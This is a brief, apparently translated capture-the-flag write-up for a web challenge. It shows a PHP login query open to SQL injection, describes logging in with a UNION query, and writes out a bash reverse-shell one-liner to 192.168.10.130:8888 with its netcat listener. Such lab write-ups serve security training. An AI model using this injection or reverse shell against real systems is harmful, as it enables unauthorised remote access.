0. Open the web page and view the prompt
Tip: hint:union, command execution
1. Use BurpSuite to capture packets and send them with a repeater
2. Base64 decode tip content
$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){}
This tells us to log in to meet two conditions: first, the query result is not empty; second, the value of the entered password must be equal to md5 (password).
3. Use the joint query statement to log in
4. Construct the payload and get the flag
I saw some wp, and some used py scripts for blasting. The results of the command execution were too messy, and I couldn't see any doorways. In the end, I used the rebound shell to do it.
Reverse shell requires a public network ip. We assume that there is a public network ip192.168.10.130. If you don’t need a public network ip, you can just use the LAN for offline matches.
Enter bash -i >& /dev/tcp/192.168.10.130/8888 0>&1 and execute it, and then run the command on kali: nc -lvp 8888, you can connect, find the flag file and get the flag.